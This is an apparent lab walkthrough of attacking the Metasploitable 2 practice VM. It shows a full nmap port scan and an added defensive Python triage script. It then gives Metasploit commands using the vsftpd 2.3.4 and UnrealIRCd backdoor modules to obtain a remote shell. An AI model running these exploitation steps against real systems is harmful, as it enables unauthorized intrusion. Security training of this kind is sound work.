
Metasploitable Practice System: A Hands-On Walkthrough

2013-12-20 10:34:56  |  Category: Metasploit |  Tags: metasploit
Download location for the practice system:
http://sourceforge.net/projects/metasploitable/files/Metasploitable2/

1. Port scan
root@bt:~# nmap -p0-65534 192.168.159.129
Starting Nmap 6.40 ( http://nmap.org ) at 2013-12-20 10:12 CST
Nmap scan report for 192.168.159.129
Host is up (0.00032s latency).
Not shown: 65505 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
25/tcp    open  smtp
53/tcp    open  domain
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
512/tcp   open  exec
513/tcp   open  login
514/tcp   open  shell
1099/tcp  open  rmiregistry
1524/tcp  open  ingreslock
2049/tcp  open  nfs
2121/tcp  open  ccproxy-ftp
3306/tcp  open  mysql
3632/tcp  open  distccd
5432/tcp  open  postgresql
5900/tcp  open  vnc
6000/tcp  open  X11
6667/tcp  open  irc
6697/tcp  open  unknown
8009/tcp  open  ajp13
8180/tcp  open  unknown
8787/tcp  open  unknown
34625/tcp open  unknown
44997/tcp open  unknown
47588/tcp open  unknown
53325/tcp open  unknown
MAC Address: 00:0C:29:38:D3:AB (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.80 seconds
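
A defender-side triage of scan output in the format shown above, as an added example that is not part of the original post: it parses the PORT/STATE/SERVICE table and groups the open ports by what should be reviewed first. The category sets and the sample lines are assumptions constructed for this example.

```python
import re

# Constructed sample: a few lines in the format of the scan output above.
SAMPLE = """\
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
512/tcp   open  exec
3306/tcp  open  mysql
5900/tcp  open  vnc
8787/tcp  open  unknown
34625/tcp open  unknown
MAC Address: 00:0C:29:38:D3:AB (VMware)
"""

# Triage policy: an assumption of this example, adjust to your environment.
CLEARTEXT = {"ftp", "telnet", "exec", "login", "shell", "vnc", "X11"}
INTERNAL_ONLY = {"mysql", "postgresql", "nfs", "rpcbind", "distccd",
                 "rmiregistry", "ajp13", "netbios-ssn", "microsoft-ds"}

# Matches "21/tcp    open  ftp"; trailing columns (e.g. a version) are ignored.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")

def parse_ports(text):
    """Return [(port, proto, state, service)] from nmap normal output."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            rows.append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return rows

def triage(rows):
    """Group open ports into categories a defender should review first."""
    findings = {"cleartext": [], "internal_only": [], "unidentified": [], "other": []}
    for port, _proto, state, service in rows:
        if state != "open":
            continue
        if service in CLEARTEXT:
            key = "cleartext"          # credentials and data cross the wire unencrypted
        elif service in INTERNAL_ONLY:
            key = "internal_only"      # should not be reachable from untrusted networks
        elif service == "unknown":
            key = "unidentified"       # needs identification on the host itself
        else:
            key = "other"
        findings[key].append(port)
    return findings

if __name__ == "__main__":
    for category, ports in triage(parse_ports(SAMPLE)).items():
        print(f"{category:14} {ports}")
```

The scan above used -p0-65534, which leaves port 65535 unchecked. A service name of `unknown` means the port has no entry in nmap's service table, so identify the listener on the host itself (for example with `ss -ltnp`).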

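2. Testing different exploit modules against different ports
Port 21: the exploit module is unix/ftp/vsftpd_234_backdoor
Port 25: linux/smtp/exim4_dovecot_exec     // reported that the service was not started; exploitation failed
Port 6667: the exploit module is unix/irc/unreal_ircd_3281_backdoor
Steps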
use unix/ftp/vsftpd_234_backdoor
set rhost 192.168.**.**
exploit
This yields a shell.
